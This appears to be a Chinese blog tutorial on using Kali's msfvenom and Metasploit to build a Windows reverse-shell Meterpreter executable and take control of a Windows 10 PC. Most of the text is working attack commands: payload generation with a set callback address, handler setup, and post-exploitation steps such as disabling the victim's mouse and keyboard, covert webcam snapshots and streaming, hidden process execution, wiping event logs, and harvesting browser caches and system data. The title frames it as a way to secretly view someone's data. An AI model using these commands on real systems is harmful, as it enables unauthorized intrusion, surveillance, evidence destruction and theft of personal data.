Meterpreter

Meterpreter是Metasploit框架中的一个扩展模块，作为溢出成功以后的攻击载荷使用，攻击载荷在溢出攻击成功以后给我们返回一个控制通道。使用它作为攻击载荷能够获得目标系统的一个Meterpreter shell的链接。Meterpreter shell作为渗透模块有很多有用的功能，比如添加一个用户、隐藏一些东西、打开shell、得到用户密码、上传下载远程主机的文件、运行cmd.exe、捕捉屏幕、得到远程控制权、捕获按键信息、清除应用程序、显示远程主机的系统信息、显示远程机器的网络接口和IP地址等信息。

查看kali和window的ip

在kali终端ifconfig，ip是192.168.0.103

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.103 LPORT=5555 -f exe -o met.exe

生成met.exe可执行的exe，并点击执行。

复制到win10主机，需要关闭window的防火墙

window点击exe前，kali需要进入msfconsole， 5555需要对应

msfconsole msf5 > use exploit/multi/handler msf5 exploit(multi/handler) > msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp msf5 exploit(multi/handler) > set lhost 192.168.0.103 lhost => 192.168.0.103 msf5 exploit(multi/handler) > set lport 5555 lport => 5555

exploit命令发起攻击

在window桌面不小心放在重要的文件，直接cat查询

补充下，msfconsole的一些命令，只有控制了window，下面的命令都可以执行。

# 让他不能用鼠标 uictl开关键盘/鼠标 uictl [enable/disable] [keyboard/mouse/all] #开启或禁止键盘/鼠标 uictl disable mouse #禁用鼠标 uictl disable keyboard #禁用键盘# 如果开了摄像头拍照 webcam摄像头命令 webcam_list #查看摄像头 webcam_snap #通过摄像头拍照 webcam_stream #通过摄像头开启视频 execute执行文件 execute #在目标机中执行文件 execute -H -i -f cmd.exe # 创建新进程cmd.exe，-H不可见，-i交互# clearav清除日志 clearav #清除windows中的应用程序日志、系统日志、安全日志# 基本网络命令 ipconfig/ifconfig netstat –ano arp getproxy #查看代理信息 route #查看路由# 信息收集的脚本位于：/usr/share/metasploit-framework/modules/post/windows/gather /usr/share/metasploit-framework/modules/post/linux/gather# 信息收集的脚本较多，仅列几个常用的：run post/windows/gather/checkvm #是否虚拟机 run post/linux/gather/checkvm #是否虚拟机 run post/windows/gather/forensics/enum_drives #查看分区 run post/windows/gather/enum_applications #获取安装软件信息 run post/windows/gather/dumplinks #获取最近的文件操作 run post/windows/gather/enum_ie #获取IE缓存 run post/windows/gather/enum_chrome #获取Chrome缓存 run post/windows/gather/enum_patches #补丁信息 run post/windows/gather/enum_domain #查找域控

其实很弄别人是不行的，别人怎么会傻傻的关防火墙。

总结

以上是生活随笔为你收集整理的用kali的Meterpreter控制win10，可以偷看你的电脑的所有数据的全部内容，希望文章能够帮你解决所遇到的问题。

如果觉得生活随笔网站内容还不错，欢迎将生活随笔推荐给好友。